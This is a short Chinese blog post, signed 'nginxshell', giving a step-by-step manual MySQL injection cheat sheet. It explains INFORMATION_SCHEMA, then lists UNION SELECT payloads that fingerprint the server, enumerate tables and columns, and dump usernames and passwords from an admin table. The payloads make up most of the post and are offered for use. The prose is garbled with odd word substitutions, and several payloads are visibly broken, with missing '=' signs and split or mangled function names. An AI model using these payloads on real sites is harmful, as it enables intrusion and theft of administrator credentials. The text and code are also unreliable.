mysql简略手工盲注技能

申明:固然网上对于mysql手工盲注的材料良多 然而大多都是大篇幅 语句极其庞杂

学习盲注前先懂得下 IFORMATION_SCHEMA 库

Mysql5内置的系统数据库IFORMATION_SCHEMA,其构造如MSSQL中的master数据库，其中记载了Mysql中所有

存在数据库名、数据库表、表字段。重点请求研讨多少个对SQL注入有用的数据表阐明。

1.得到所有数据库名：

'SCHEMATA 存储数据库名的表

'字段：SCHEMA_NAME 数据库名称

'TABLES 存储表名

'字段：TABLE_SCHEMA 表现该表名属于哪个数据库名

'字段：TABLE_NAME 存储表的表名

'COLUMNS 存储的字段名表

'字段：TABLE_SCHEMA 该字段所属数据库名

'字段：TABLE_NAME 存储所属表的名称

'字段：COLUMN_NAME 该字段的名称

###########################################################################

0x001 获取系统信息:

union select 1,2,3,4,5,concat(global.version_pile_os,0x3c62723e,datadir,0x3c62723e,user(),0x3c62723e,version()da tabase(),0x3c62723e,database()),7,8,9 /.

/.

global.version_pile_os 获取体系版本

datadir 数据库门路

database() 当前数据库名称

0x3c62723e 换行HEX值

./

######################################################################

0x002 获取表名

union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema0x67617264656e /.

/.

0x67617264656e 为当前数据库名

group_concat(table_name) 应用group_concat函数 一步获得该库所有表名

./

######################################################################

0x003 获取字段

union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name0x61646d696e and table_schema0x67617264656e limit 1 /.

/.

group_concat(column_name) 同样是 一口吻 取得该表0x61646d696e所有字段

0x61646d696e 抉择一个表

0x67617264656e 数据库名

./

#####################################################################

0x004 获取数据

union select 1,2,3

,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin

union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin

/.

0x3c62723e 换行符,HEX编码

group_concat 同时失掉该字段所有数据

./

BY：nginxshell

阅读(388) | 评论(0) | 转发(0) |

0

上一篇：没有了

下一篇：没有了